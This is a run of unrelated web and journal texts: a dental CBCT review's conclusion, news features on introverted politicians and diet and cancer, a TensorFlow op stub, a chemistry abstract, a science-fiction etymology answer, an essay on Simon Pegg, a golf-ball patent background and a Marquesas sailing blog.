However, the ALARA principle should be kept in mind and should be followed with each exposure. L[IMITATIONS OF CONE BEAM COMPUTED TOMOGRAPHY IMAGING]{.smallcaps} {#sec2-3} ------------------------------------------------------------------ While there has been enormous interest on CBCT, this technology currently has limitations too related to the "cone beam" projection geometry, detector sensitivity, and contrast resolution.\[[@ref30]\] These parameters create an inherent image (known as noise) that reduces image clarity in such a way that current systems are unable to record ST contrast at the relatively low dosages applied for maxillofacial imaging; however, with advanced systems, it can be achieved.\[[@ref30]\] Another factor that impairs CBCT image quality is image artifacts, such as streaking, shading, rings, and distortion.\[[@ref31]\] Streaking and shading artifacts due to high areas of attenuation and inherent spatial resolution may limit adequate visualization of structures in the oral and maxillofacial region.\[[@ref31]\] Another limitation is the cost of the equipment and investment in the area where it is to be installed, as CBCT causes scattering of the radiation, especially when larger tissue is being evaluated, causing polydirectional Compton scattering. Thus, it needs lead barriers to be placed, adding to the investment.\[[@ref31]\] Another disadvantage is the poor quality in ST assessment.\[[@ref13]\] The dynamic range of CBCT for contrast resolution can reach only 14-bit maximally.\[[@ref32]\] To accurately read a ST phenomenon, a 24-bit contrast resolution is needed.\[[@ref29]\] In addition, unlike multidetector CT, the Hounsfield units of tissue density are not calibrated on CBCT, which makes it unreliable to compare tissue density based on CT numbers generated from different CBCT units.\[[@ref32]\] C[ONCLUSION]{.smallcaps} {#sec1-3} ======================== From the aforementioned literature review, along with the advantages and disadvantages of CBCT, it seems that CBCT may not be the best imaging modality to evaluate STs; however, there are situations in which CBCT can help such as analysis of ST airway constrictions and obstructions for patients suffering from sleep apnea, other ST evaluations for orthodontic treatment and periodontal treatment,\[[@ref33][@ref34]\] and detection of healed root fractures.\[[@ref35]\] The development and rapid commercialization of CBCT technology has undoubtedly increased practitioners' use of CBCT, as it is capable of providing accurate, submillimeter resolution images in formats enabling 3D visualization of the complexity of the maxillofacial region. It also provides clinicians with a modality that extends maxillofacial imaging from diagnosis to image guidance for operative and surgical procedures. Today, Wilhelm C. Röntgen\'s discovery through its evolution is providing diagnostic efficacy that can result in improved therapeutic efficiency in the medical and dental fields. F[INANCIAL SUPPORT AND SPONSORSHIP]{.smallcaps} {#sec2-4} ----------------------------------------------- Nil. C[ONFLICTS OF INTEREST]{.smallcaps} {#sec2-5} ----------------------------------- There are no conflicts of interest.
{ "pile_set_name": "PubMed Central" }
Is Introversion Still a Liability in Politics? By ANNA NORTH 2015.02.27 07:55 “You could almost say that introversion has become the new cool,” said Brian R. Little, a professor of psychology at Cambridge University. In large part as a result of Susan Cain’s popular 2012 book “Quiet,” he explained, “there has been a recognition of the quiet strengths of introversion.” But in political candidates, introversion still seems to arouse some suspicion. At Politico, S.V. Dáte writes that “the single biggest challenge facing the embryonic Jeb Bush-for-president campaign” might be “a grueling, 600-plus-day slog that requires shaking thousands of hands and chatting with countless voters all over the country, when the candidate in question would just as soon disappear into a book.” At a recent speech, he adds, “the problem was not that he wasn’t ready for prime time; it was that he looked as if he didn’t want to be near prime time.” At New York Magazine, Jaime Fuller rounds up a number of media references to Mr. Bush as an introvert. And he and Mr. Dáte note that Mr. Bush explicitly identified himself as such at a San Francisco event in January. In an age when introversion is cool — or, at least, much-discussed — is this still a problem? According to Timothy A. Judge, a management professor at Notre Dame who has studied personality, it may be. “I certainly do think introversion is a liability for all types of leadership, including political leadership,” he said in an email. “Extroversion is a social trait, and research we’ve conducted suggests that extroverts are more popular in both educational and work contexts.” He believes the influence of “Quiet” may be waning. “In my experience, people dislike being labeled as introverts as much as they always have,” he said. “We are a social society, and I think in some ways (due to social networking) the ‘publicness’ of our identities has only increased.” Like severalothers, he thinks that President Obama is an introvert: “From all that I’ve read about him, while he can be a gifted orator, and obviously has a keen intellect, he is not a ‘man of the people’ — he prefers to surround himself with a fairly small cadre of advisers he knows well, and disdains the rather public nature of negotiating with Congress.” And, he said, “I do believe this has hampered him.” Still, he cautioned, being introverted doesn’t always harm a political career: “One can always think of exceptions, both in terms of winning elections and being popular.” Amir Erez, a professor of management at the University of Florida, believes introversion has gained more attention and respect in the last few years. However, he said, “it’s definitely an advantage to be an extrovert as a leader,” because leaders need to demonstrate qualities like dominance, assertiveness and sociability. “From all the personality traits that we know about, extroversion is the most highly correlated with leadership.” Still, he said, “it doesn’t mean that as a leader you cannot be an introvert.” Introverted people “can learn to become more sociable, more dominant,” he explained, “and I believe that political leaders that are introverted, that’s exactly what they’re doing.” Dr. Little also believes introverts can behave more like extroverts if they need to. “Many of us, as a result of our vocational or professional demands, act out of character,” he said. “Politicians are sometimes enjoined by their profession to act in ways that are highly extroverted, combative, upbeat, promotional,” he explained, “and people do rise to those occasions,” even if they’re naturally introverted. And, he argued, your level of extroversion is far from the only thing about your personality that matters. Openness to experience, conscientiousness and emotional stability can also be beneficial in a leader. So can the ability to behave in ways that fit the situation at hand: “I think we need to have the ability to shift and pivot on these personality dimensions,” he said. “Extroverts need to be able to adopt an introverted mode when they’re doing detail work, highly conscientious individuals need to look up every now then and to play with alternate ideas.” “It’s the flexibility to embody both ends of the spectrum that is really crucial,” he explained. Other qualities may also make the effect of introversion less pronounced — or even remove it entirely. Ronald Riggio, a professor of leadership and organizational psychology at Claremont McKenna, and his team have found that when someone’s social skills are taken into account, “the effect of extroversion on leadership disappears.” That is, it “doesn’t matter if you’re an extrovert or an introvert, if you’re interpersonally skilled.” “If you can do well in working a room,” he explained, “if you can appear enthusiastic and articulate when you speak, then being an introvert is not a liability.” Ms. Cain, meanwhile, has argued that introversion may confer its own benefits. In a 2012 New York Times Op-Ed, she wrote: “Introverted leaders often possess an innate caution that may be more valuable than we realize. President Clinton’s extroversion served him well but may have contributed to conduct that almost derailed his presidency. It’s impossible to imagine the cautious and temperate Mr. Obama mired in the Monica Lewinsky scandal.” Introverts hoping to run for office may want to enlist the help of those close to them: “The support of one’s loved ones is really crucial,” said Dr. Little. He also advises such political hopefuls “not to be afraid to act out of character, rise to the occasion, motivate yourself to do so, but make sure you have restorative niches available for you” when the social interaction of campaigning becomes overstimulating. Mr. Bush may already be familiar with acting out of character. Mr. Dáte writes that when the avowed introvert ran for governor of Florida in 1994, he undertook “a six-day, 28-city, 50-event motor-home swing leading into the Republican primary. A breakfast speech, luncheon remarks, a couple of local government photo ops, a rubber-chicken dinner, capped off with a near-midnight arrival at a motel in the next town on the list, only to do it all over again the following morning.” At the time, Mr. Dáte argues, “Jeb Bush wanted to be governor more than he needed his solitude.” The same may be true of the presidential nomination: “Given his track record, the safer bet is probably on Bush. Even an introverted one.” And America, Dr. Riggio suggests, might do well to focus more on issues than on introversion. “I think people put too much emphasis” on the trait, he said. “We really should talk about, what does the person represent? What are their ideas?”
{ "pile_set_name": "Pile-CC" }
Vegetables, Fruits, Soy Help Defeat Cancers Vegetables, Fruits, Soy Help Defeat Cancers WASHINGTON, DC, March 17, 2010 (ENS) – The benefits of fruits and vegetables for cancer prevention and survival are unmistakable, according to the Washington, DC-based nonprofit Physicians Committee for Responsible Medicine. Pointing to two newly published studies, the doctors say, “There is no need for animal-derived products in the diet, and you’re better off without them.” The first research paper relates to breast cancer prevention in 34,028 postmenopausal women who participated in a Singapore Chinese health study. Consumption of soy, fruits, and vegetables helped reduce the risk of developing breast cancer in this group of women, according to the new study published in the “American Journal of Clinical Nutrition.” Fruits and veggies can help prevent cancers. (Photo by Keith Weller courtesy USDA) Co-author Lesley Butler, PhD, assistant professor of epidemiology at Colorado State University, and her team found that postmenopausal women who consumed plenty of soy, fruits, and vegetables had a 30 percent lower risk of developing breast cancer, compared with those who consumed relatively little of these foods. The longer the women had consumed these foods, the less chance they had of developing breast cancer, the study showed. The second study relates to ovarian cancer survival in 341 Illinois women. Women with the highest fruit and vegetable intakes have better ovarian cancer survival rates than those who generally neglect these foods, according to the new study in the “Journal of the American Dietetic Association.” Researchers examined food patterns prior to ovarian cancer diagnosis in the 341 women. They found that yellow and cruciferous vegetables, in particular, contributed to longer survival, whereas consumption of dairy products and red and processed meats shortened lifespan. Co-author Therese Dolecek, PhD, of the Institute for Health Research and Policy at the University of Illinois, Chicago, and her colleagues concluded that low-fat, plant-based diets are not only beneficial for cancer prevention – they may also play a role in increasing survival time after diagnosis. Ovarian cancer is the fifth leading cause of cancer-related death among women in the United States. These studies strengthen what is already known about reducing the risk of cancer. While not rejecting meat for a healthy diet, the American Cancer Society advises that eating at least five servings of fruits and vegetables a day “can help reduce your cancer risk.”
{ "pile_set_name": "Pile-CC" }
op { graph_op_name: "CollectiveReduceV2" summary: "Mutually reduces multiple tensors of identical type and shape." visibility: HIDDEN }
{ "pile_set_name": "Github" }
Water-soluble Hemin-mPEG-enhanced Luminol Chemiluminescence for Sensitive Detection of Hydrogen Peroxide and Glucose. In the present study, we synthesized a water-soluble substance (Hemin-mPEG) at room temperature by using hemin and poly(ethylene glycol) methyl ether (mPEG). It was found that the Hemin-mPEG maintained the excellent catalytic activity inherited from hemin, and was first used to catalyze a luminol-H2O2 chemiluminescence (CL) system to generate an intense and slow CL signal. The results of a mechanism research showed that the presence of Hemin-mPEG could promote the production of oxygen-relative radicals from H2O2 and dissolved oxygen in solution. Based on this mechanism, an ultra-sensitive, cheap and simply practical sensor for detecting glucose and H2O2 was developed. Under the most optimal experimental conditions, H2O2 and glucose detection results exhibited a good linear range from 0.002 to 3 μM and from 0.02 to 4 μM, respectively, and the detection limits were 1.8 and 10 nM, respectively. This approach has been successfully used to detect glucose in actual biological samples, and achieved good results.
{ "pile_set_name": "PubMed Abstracts" }
Q: Initial uses of the term "ultradrive" as a faster FTL drive? This question about an early story about an FTL drive with unfortunate side effects for which the answer was Randall Garrett's 1954 "Time Fuze" and the use of "ultradrive" left me pondering the initial and any later uses of the term. I'm most familiar with "ultradrive" as the improved FTL drive from Peter Hamilton's ongoing Commonwealth series and one type of FTL drive from Vernor Vinge's 1992 "A Fire Upon the Deep,", but a quick Google of the term mostly brings up references to Chrysler's 1989 automatic transmission system. Is Garrett's story -- which I have yet to read -- the first use of the term? Were there uses between his story and Vinge's novel? A: Brave New Words: The Oxford Dictionary of Science Fiction (edited by Jeff Prucher) defines "ultradrive" as follows: Ultradrive n. a space drive that enables spaceships to travel faster than the speed of light. Compare HYPERDRIVE, OVERDRIVE. In general, the term "ultradrive" may be used in science fiction for any FTL drive. Any idea that an ultradrive is an improvement on, or an alternative to, some other form of FTL propulsion, will be peculiar to a particular work or writer. The earliest citation for "ultradrive" in Brave New Words is from Poul Anderson's novelette "Tiger by the Tail" in Planet Stories, January 1951, available at the Internet Archive: Captain Flandry opened his eyes and saw a metal ceiling. Simultaneously, he grew aware of the thrum and quiver which meant he was aboard a spaceship running on ultra[-]drive. It is not clear whether the word "ultradrive" was meant to be hyphenated or not, since the hyphen occurs at a line break. Brave New Words does not record any uses of "ultradrive" between Randall Garrett's 1954 "Time Fuze" and Vernor Vinge's 1992 A Fire Upon the Deep, but that probably just means nobody has looked very hard for one. There is a lot of interest in antedatings, not so much in interdatings. Here is one from Algis Budrys's short story "Hot Potato" in Astounding Science Fiction, July 1957, available at the Internet Archive: Four hundred years ago, this had been Man's earliest foothold on the stars — earliest, and, as it developed, only. The passage time had been worked down from ten years to five and a half, toward the end, but that was the best they could do. They were tinkering with an ultradrive just before the Invaders hit Earth. They still were, but it was too late for the Solar System. Centaurus was the focus of the human race today, and Earth, like the Western Roman Empire, was a jumble of ruins where the wolves prowled down out of the hills.
{ "pile_set_name": "StackExchange" }
Chancellor Angela Merkel, who has ruled Germany since 2005, has decided to run for a fourth term and has started planning her 2017 re-election campaign, according to an unsourced report on Saturday in Der Spiegel news magazine. A spokeswoman for Merkel's Christian Democrat (CDU) party declined to comment on the report. The chancellor is on a hiking holiday in the Alps. Merkel, who turned 61 on July 17, has not made any public comments about whether she would run for a fourth term, although...
{ "pile_set_name": "Pile-CC" }
New Years Traditions New Years was celebrated with a "most dangerous tradition" at Rick Bragg's childhood home. Learn why his New Years was a loud one—it's not the fireworks! Hide Transcript Hi. I'm Rick Bragg. As sophisticated as I might appear to be, New Year's at our house was had probably the most dangerous tradition I've ever heard of. People do all kind of odd things on New Year's. They get a little inebriated and blow a whistle but at our house, my brother Sam and his friends at the stroke of the stroke of midnight on New Year's. They all went out into the yard with their guns. And there was one stump that they fired at. Like one, two, three fire. And all my cousins and their friends. Would shoot the same stump. The problem is, over the years, they blew the stump away. So that by now, they're really just shooting at a hole in the ground. But I'm pretty sure they're still shooting. I guess y'all didn't need to know that. Hi. I'm Rick Bragg. As sophisticated as I might appear to be, New Year's at our house was had probably the most dangerous tradition I've ever heard of. People do all kind of odd things on New Year's. They get a little inebriated and blow a whistle but at our house, my brother Sam and his friends at the stroke of the stroke of midnight on New Year's. They all went out into the yard with their guns. And there was one stump that they fired at. Like one, two, three fire. And all my cousins and their friends. Would shoot the same stump. The problem is, over the years, they blew the stump away. So that by now, they're really just shooting at a hole in the ground. But I'm pretty sure they're still shooting. I guess y'all didn't need to know that.
{ "pile_set_name": "Pile-CC" }
Share: Isn’t it fun when a public figure puts their foot in their mouth? Fans of that person or of the thing they’re seemingly decrying feel hurt or betrayed and the internet explodes with the “Get him!” furor of a torch-wielding mob. It’s nothing new, and surely it’ll happen again. This time, however, it concerns one of Geekdom’s godfathers, the self-professed Nerd-Do-WellSimon Pegg. Pegg has been a symbol for nerd culture since his TV series Spaced in 1999 and through the Cornetto Trilogy (Shaun of the Dead, Hot Fuzz, and The World’s End), which are all in their own way about prolonged adolescence and stunted adulthood. He’s also gained huge nerd props for portraying Scotty in the updated Star Trek movies, even co-writing the forthcoming third installment. All of this is why his recent remarks to the UK publication The Radio Times seem not only out of place but possibly hurtful to his fan community. io9 certainly raked him over the coals for his below comments: Before Star Wars, the films that were box-office hits were The Godfather, Taxi Driver, Bonnie And Clyde and The French Connection – gritty, amoral art movies. Then suddenly the onus switched over to spectacle and everything changed … I don’t know if that is a good thing. … Obviously I’m very much a self-confessed fan of science fiction and genre cinema but part of me looks at society as it is now and just thinks we’ve been infantilised by our own taste. Now we’re essentially all consuming very childish things – comic books, superheroes. Adults are watching this stuff, and taking it seriously. It is a kind of dumbing down, in a way, because it’s taking our focus away from real-world issues. Films used to be about challenging, emotional journeys or moral questions that might make you walk away and re-evaluate how you felt about … whatever. Now we’re walking out of the cinema really not thinking about anything, other than the fact that the Hulk just had a fight with a robot. Now, he’s certainly simplified a lot of things, but on the surface, he’s not wrong. There was a period of time from about 1967 until 1977-ish (give or take) when films were being made by a younger, angrier stable of filmmakers who had something to say about America and the world as a response to the loss of innocence accompanied by the murders of positive figures like JFK, MLK, and RFK — as well as the betrayal felt from Richard Nixon and the Watergate scandal and the Vietnam War. It was a more politically charged period of time and films reflected that and, to its credit, or because it didn’t have much of a choice, Hollywood embraced it. Nowadays, Pegg also not-incorrectly states, comic book movies and big-spectacle science fiction are the largest and most successful movies (in the grand sense; obviously other types of movies do well too) and that thinking about these big comic book and sci-fi movies does, in a way, stunt adulthood inasmuch as it keeps us thinking about things we loved as children. I can’t disagree with this outright; Hollywood is 100% cashing in on the now-in-their-30s people who were kids in the ’80s and ’90s because we have money and we like the stuff we liked as kids. Nostalgia is a very powerful and lucrative thing. So, in those respects, Pegg isn’t wrong. At all. What people can and should object to is the tone with which he’s saying these things, as though they’re a bad thing and that because these movies are huge spectacle and money-making endeavors they are completely devoid of anything of value to say. That they are, in fact, “dumbing down” the adults of today. Some comic book and spectacular sci-fi movies are in fact guilty of this, by virtue of their being dumb movies. There are also plenty which don’t do this and engage with today’s society in a way that might make people think more about it than they hadn’t in the past. Captain America: The Winter Soldier is all about the dangers of the government having too much power, having surveillance on their own people, of becoming a police state, and the ease of which a hostile group could enact their own plans from within. This is something plenty of movies were doing in the ’70s, as the filmmakers themselves have admitted, and while Cap 2 is housed within the same universe as a giant rage monster smashing a god or a robot, it doesn’t diminish the fact that it engaged with a topical issue intelligently. There are also many examples recently of science fiction movies being both smart and spectacular. Last year was what I considered the Summer of Good Sci-fi and it contained movies like X-Men: Days of Future Past, Dawn of the Planet of the Apes, and Snowpiercer which were big, spectacle movies–a comic book movie in the first case–that also engaged with societal issues like racism, segregation, rights for “others,” fear of “others,” and classism. Will Star Wars deal with these heady issues? Probably not, but many others do. If anything, it gets some people who wouldn’t normally think about the world in these terms to think about the issues and ingest the knowledge because they think they’re just going to see Magneto move a baseball stadium with his magnet powers. In the 1950s, science fiction was used to comment on everything from McCarthyism and the Red Scare to overpopulation and nuclear annihilation. Films are doing much the same today, even if they have a huge behemoth like Disney, Marvel, Lucasfilm, or DC Comics as their backdrops. To be fair, and probably because of all the negative reactions he received, Pegg wrote a rebuttal to himself on his own site this morning, wherein he clarified a lot of the statements and take out much of the pull-quote harshness. It’s a very good piece you should certainly read, but some of the takeaways are things like Travis Bickle was real-person-dark as opposed to Bruce Wayne’s kind-of-dark, that more people were talking about the Star Wars and Batman V Superman trailers than they were the Nepalese earthquake or the British general election, and “the more spectacle becomes the driving creative priority, the less thoughtful or challenging the films can become.” People want an escape; they want to be entertained, and studios are banking on 15-50 year-olds wanting to be bombarded with awesome, recognizable characters and properties. While Pegg’s initial statements seemed blanketed and dismissive, he didn’t mean them that way, and whether or not the tone was dismissive and haughty, the statements aren’t entirely false. But within that cynicism, there’s still plenty of room for science fiction and comic book movies to make us ponder our own world even as we’re watching a galaxy far, far away. What do you think? Are you still mad at Simon Pegg? Do you feel betrayed, or do you think he had some interesting things to say? Let us know in the comments below.
{ "pile_set_name": "Pile-CC" }
Golf balls generally comprise a core surrounded by a cover and optionally at least one intermediate layer there between. The cover forms a spherical outer surface and typically includes a plurality of dimples. Any of the core or the cover may incorporate multiple layers and the core may be solid or have a fluid-filled center surrounded by windings or molded material. Golf ball covers may be formed from a variety of materials such as balata, polyurethane, polyurea, thermoplastic compositions and ionomer resins such as SURLYN® and IOTEK®, depending upon the desired performance characteristics of the golf ball and desired properties of the cover. While golf balls are conventionally white, essentially any desired solid color or pattern can now be provided. Color may be incorporated in the cover material itself or be applied to the cover outer surface as a coating. Typically, in a painted golf ball, a first coat or primer layer of paint is applied, followed by a second, i.e., finishing coat or layer. It is common for coating to be done via a spray system wherein each golf ball is grasped or otherwise secured by a pronged device and progressed through a spray booth wherein coatings are applied to the golf ball's outer surface. Additionally, robotic systems sometimes pick up the golf balls following coating and transfer them to alternative locations during the curing process. However, this grasping step can result in visually unappealing “pick marks” or defects on the golf ball surface, which can negatively impact a golfer's perception of golf ball quality as well as cause durability issues such as delamination when a club face strikes the golf ball surface. U.S. Pat. No. 2,833,241 of Crowley et al. (“'241 patent”) discloses a method for coating golf balls without using prongs. Each golf ball rolls down a ramp and is picked up by a high velocity air stream that is directed upwardly through an aligned screened section of the ramp as the golf ball arrives at the screened section. The golf ball becomes supported by the air stream while coating material is injected into the air stream to coat the golf ball's surface. However, using this method can produce defects or imperfections in the finished golf ball as well, especially, for example, when the high velocity air stream fails to pick up a golf ball properly or the golf ball is not supported sufficiently within the air stream during coating. Accordingly, there remains a need for reliable, efficient and cost effective methods and systems for coating a golf ball component without contacting another surface prior to curing the coating material and without the need for a pressurized air stream to up-take and contain the golf ball component during coating. The present inventive method and system for covering a golf ball component with a coating material address and solve these needs.
{ "pile_set_name": "USPTO Backgrounds" }
Sunday, May 26, 2013 We left the next day for Nuku Hiva and had a great sail. We dropped our anchor in Baie Taiohae with a couple dozen other boats. Once we were settled in, Richard and I went to shore in the dinghy and bumped into Heidi and Joe from s/v Huck. The four of us, plus Joe and Liz from s/v Set Me Free, headed to a little restaurant and ordered a round of Hinanos and talked about our passages. Joe (from Huck) mentioned that the agent they used to clear into the country has a brother here on the island that does traditional Marquesan tattoos. That was all I needed to hear. I have been thinking about this tattoo for a couple of years now and here I was in the Marquesas with a tatt connection. It doesn’t get much better than that. Heidi told me that all I had to do was go down to the second food truck and ask for the tattoo guy…that simple. So after our beers, Richard and I walked down to the second food truck and I inquired about the tattoo guy in my less than perfect French. “Excusez moi, mais une amie me dit que le frère du son agent ici faire le tatouage and je cherche pour lui. Lui connaissez-vous?” It might not have been correct, but the next thing I know the woman in the food truck is on her cell and asks me, in French, what time I’d like my tattoo tomorrow? “A dix heure a la matin?” “Ca va bien!” And it was done! I told Ben about my discovery and he indicated that he would come along for moral support. Richard was at best “neutral” about the idea of me getting more ink so having Ben along made the experience at least a bit more exciting. The next morning, Richard took Ben and me to the small pier, I stopped at the bank and then Ben and I headed to the food truck where we were picked up by Francois who drove us out to his house. Now, this might not mean much to most of you, but this Francois is the grandson of Daniel of Daniel’s Bay in Nuku Hiva. And Daniel’s Bay was the set location for the very first “Survivor” season. And we will be anchoring in Daniel’s Bay in a few days so the “full circle “ of getting a traditional tattoo in the Marquesas really hit home for me. Let the tatting begin! Francois and I talked a bit about my life so that he could put together a “story” in the form of traditional Marquesan motifs. Francois speaks very little English so the entire day, about eight hours in all, was spent speaking in French. He then drew the design on my arm and once he was done that I jumped up on the table and the needles came out. In all I spent 4 hours under the needle, and for the majority of that time, I really have to admit that it was a painless experience. Yea, a few times the design was in those fleshy places that hurt, but for the most part it was no big deal. By the time it was done, the design had morphed into something that started on my shoulder and worked its way down to my elbow. Opps…the original design that I had showed Richard was about the size of a quarter and somehow I ended up with a significantly larger tattoo. Ben confirmed that it looked great and that the modifications that Francois was making while the needle was going were definitely enhancing the overall design. Almost done. When Francois finally pulled the needle away and I got up off of the table and had my first look at his work I was amazed. I looked over at Ben and he gave me the “thumbs up” indicating that he thought it looked good and when I looked over at Francois, he seemed somewhere else as he admired his ink work, and kept repeating, “Tres joli”. The rest of the story goes something like this…Ben got convinced to get a tattoo of a manta ray on his ankle (ouch!), which looks great and he loves (he was a tattoo virgin prior to this “peer pressure”). We called Richard on the VHF radio and met up with him and Jory on the dock and then went back to Kyanos where Ben made pizza for the four of us. And here it is…I hope you like it as much as I do because I LOVE IT! Excuse the mess in the background and focus your attention on the tattoo.Per the artist: PLEASE DO NOT COPY THIS DESIGN...thanks. I wanted to go to shore one day to do some laundry. There was a tree that had a hanging faucet with fresh water right on the beach so one day I took our big bucket, the plunger, some detergent and my dirty clothes to shore intent on doing my laundry. I approached the faucet, turned the handle and nothing came out. The locals who were sitting around told me that the water was turned off and would not be turned on until 5 PM. I checked my watch and noted that it was a little after 3 PM, so I gathered my stuff and started to head back to the dinghy to go back to the boat. Just then, one of the locals hollered out that I should sit around and wait. Hmmm? Spend two hours sitting around or row back to the boat to wait it out? In the end I opted to stay on shore and hope for the best. As I was sitting there, a guy approached me and told me about another faucet up the road where I could do my laundry and he offered to take me there. I confirmed that he would not only take me there but that he would bring me back to the beach when I was done which he happily confirmed. That said, I threw my laundry into the back of his pickup, hopped in the passenger seat and set off on a Marquesan adventure. I say adventure because less than a century ago there was cannibalism on these islands. But that was not in the stars that day for me (to be boiled and served with potatoes, poi or breadfruit). Instead, my Marquesan friend dropped me off at another spigot and promised to return in about an hour. Sounded good to me. Breadfruit, the other potato(and it makes great hummus!). So there I stood on the sidewalk of a residential part of the village with a big blue bucket full of dirty laundry and a pamplemousse tree right next to me. I started to fill the bucket, added detergent, dropped in my dirty clothes and went to town with the plunger “agitating” my clothes. While this method of doing laundry works, it doesn’t have the same results as the machine in your basement. Oh well, it’s not like I have to look super clean or fancy for anything these days. Most days I’m lucky to remember to brush my teeth…yes I did just say that! Back to the laundry. The scene must have looked hilarious. There I was “agitating” my laundry with people walking up and down the street…”Bonjour!” “Bonjour.” I’m sure I looked like an idiot and it was only the fact that this was neither the first nor last time that I would look like an idiot in my life that I persevered. So “Bonjour!” to you and you and you! After about an hour, my “ride” showed up just as I was wringing the last of my laundry around a metal pole sticking out of the road (it worked!). I gathered my stuff, threw it into the back of his truck, hoped in and I was immediately offered some weed. Hmmm? Thanks (or “merci beaucoup”) but I’m good. “Pas de problem.” These peppers are everywhere...and blazing HOT! My new friend’s name was Harris and when we go back to the beach he introduced me to several of his other friends who invited me to attend a picnic the next day on the beach. Free local food? Count me in! So the next day, Richard and I and our friends Ben and Jory, showed up on the beach at noon. We sat around for a bit, wondering where the food was, but then my new friend Cana asked if we wanted beers…ah, yes, please! So we walked back to Cana’s truck and he opens a cooler and takes out beers (Hinano…Tahitian beer) for all of us (he opened them on the lock latch on the inside of the car door). Papaya tree...the fruit usually seemout of reach. When we finally started to eat there was some initial confusion as to whether one of the dishes on the table was bait or an appetizer; turns out it can be either! Luckily, Cana stated flatly that he doesn’t eat it which immediately made me feel better. I have worried that I would insult locals when I refused to eat something that I perceived as being gross (like monkey eyes or the testicles of ANY animal). Dodged that bullet did I! The rest of the food was actually pretty good. We had goat stew (very tasty…I actually really like goat and have had it several times since arriving here) with rice, chicken, mushrooms and rice, baked breadfruit (that literally tears apart like fresh bread and is used to slop up gravy), fried bananas, and other little nibbly things that were awesome despite my being unable to completely identify them. Cana also handed me a box containing about a dozen pamplemousse…my new favorite thing to eat. Pamplemousse is sooo good! It’s a giant grapefruit without the tartness, amazingly juicy and sweet. I have been eating these things like crazy and cannot seem to get enough of them. Luckily, everyone seems to be down with handing you several whenever they meet you. We thanked Cana for his gracious hospitality and for sharing both his food and introducing us to his family. By the way, the picnic was an event held by the lawn bowling (bocce) money league he belongs to and each team had a picnic table loaded with food. I handed Cana a spool of 50 pound test fishing line and about a dozen tuna hooks, hoping that he could use them. Friday, May 24, 2013 I'm sitting on a balcony at the Pension Vehine overlooking the the anchorage and dramatic hillside of Baie d'Hakahua on the island of Oa Pou in the Marquesas. I was unable to purchase an internet connection card at the post office as it is the weekend; in addition, the post office will be closed on Monday due to some local holiday. Richard had asked me to check in with the gendarmerie (national police) here in Hakahua and when I was done with that formality I asked about the possibility of internet connections in town given that the post office was closed for an extended time. The gendarme told me to try the pizza place that we ate at last night and ask the owner if he might let me use his connection at his hotel. The hospitality of the islanders has been nothing short of remarkable everywhere we have been in the Marquesas. The owner of the pizza place and hotel set me up on the balcony overlooking the bay with a cold bottle of water and gave me the password to the wifi connection. Slow, but who cares, I'm in the Marquesas! Just a small map so you get an idea of howthe islands are laid out. Our three weeks here have been amazing. The scenery is truly other worldly with high volcanic peaks covered in lush tropical vegetation, basaltic spires resembling a skyline, crystal clear aquamarine water, coconut palm fringed beaches...you get the idea. Thus far we have been on four of the main islands: Hiva Oa (where we checked into the country), Tahuata, Fatu Hiva, and Oa Pou, We are currently in Oa Pou and are one of two boats in the anchorage; the other boat being our buddies from s/v Kyanos, Ben and Jory. We met Ben and Jory in Atuona on Hiva Oa and have done some hiking, snorkeling, and hanging out with them along the way. They arrived here in Hakahua a few days ago and will be heading to Nuku Hiva, our next stop, in the next day or two and Richard and I will be right behind them. The backdrop at the anchorage in Atuonas, Hiva Oa. Hiva Oa was our first glimpse of the Marquesas and it didn't disappoint. The anchorage was full of boats from all over the world; some we had heard on the Pacific Puddle Jumpers' Net, and others we introduced ourselves to over the course of the four days we were anchored there. The town of Atuona was a thirty minute hike away and offered a post office, a bank, two restaurants, and three little grocery stores, in addition to a few tourist attractions. We went on a hike with Ben and Jory one day and ended up bailing before we even hit the half way mark. We were only three days out from being on the boat for 35 days and still hadn't quite gotten our land legs back so hiking was quite the challenge for both Richard and I. We turned around and heading back the trail head where we waited around for a bit before deciding to head back to the boat. We had signaled to Ben that we were turning around and when we reached the trail head, I climbed a mango tree and shook a branch which dislodged a bunch of ripe mangoes; some we ate, others we packed to take back to the boat and some were left, with a note, for Ben and Jory. Not a bad hike after all, even if we didn't make it to the top of the ridge with them. Approaching Baie Vaitah on Isle Tahuata. After Hiva Oa, it was off to Tahuata, a mere 10 miles away. We got to sail across the channel separating the two islands and pulled into a anchorage with about five other boats, including Kyanos. It was rumored that you could swim with mantas in Baie Hanamoenoa, though we did not see any mantas while we were there. While we were in Baie Hanamoenoa, I took advantage of the crystal clear water to scrub the remainder of the gooseneck barnacles off of the boat's waterline and hull. What a chore that was! Those suckers cling fast and you have to scrape them off using what looks like a plastic pastry scrapper, in addition to a scrub brush all the while holding onto a suction cup handle attached to the side of the boat. Hard work! But at least it was in a beautiful tropical setting, so I can't complain too loudly. A school of fish in the surge at Baie Vaitah, Tahuata. From Hanamoenoa we sailed to Baie Vaitah, a mere couple of miles away and took a walk with the guys from Kyanos into the jungle. Along the way ate mangoes, drank coconut water fresh from a coconut (I have become quite proficient at cracking these things open to get to the prize...fresh coconut water and meat!), gathered limes, bananas and papayas to take back to our boats. In the afternoon, Ben , Jory and I snorkeled off of the town pier and saw tons of fish swimming around a coral reef, in addition to a large eel. Jory even spotted a shark at one point and it was then that we decided to get out of the water. Rock formations in the anchorage at Fatu Hiva. Early the next morning, Richard and I raised the anchor and headed south to the island of Fatu Hiva and the fabled Bay of Virgins. It was originally called the Bay of Penises due to the volcanic spires that rise triumphantly from the ridge behind the bay but thanks to the cleansing foresight of the missionaries that visited these islands (and, luckily for us, the rest of the world!), they renamed the bay so as to save the rest of mankind from the indecent and shameful name of BAY OF PENISES. As a side note, if any of you don't know me, please be advised that the above rant should be read with the heaviest dose of sarcasm you can muster...those of you that do know me, I'm sure you could audibly hear the sarcasm in your head. Baie Hanavave will forever be the Bay of Penises in my mind. Although, truth be told, the spires here were not as phallic looking as the ones we encountered upon entering the anchorage at Baie d'Hakahua on Ua Pou. Jory, me, Richard and Ben at the waterfall on Fatu Hiva. We hiked to a waterfall described in our guide books through a dense wet forest with the crew of Kyanos. Unfortunately, we couldn't go into the pool under the falls due to contamination from wild pigs and horses in the area (not sure what that's about but decided not to risk it; besides, the water had a pronounced algae growth). On our way back to the boat, we ran into other cruisers who had looked for the waterfall but had been unsuccessful. We told them how to reach the falls and they thanked us. The four of them were on two boats, three of them were French and the fourth was Australian. We chatted for a while and exchanged future itineraries (which are typically written in sand, as they say) before parting. The next day, as we were getting ready to do an overnight passage back to the north shore of Hiva Oa, one of the boats in the anchorage appeared to come free of its anchor and several dinghies were seen attaching 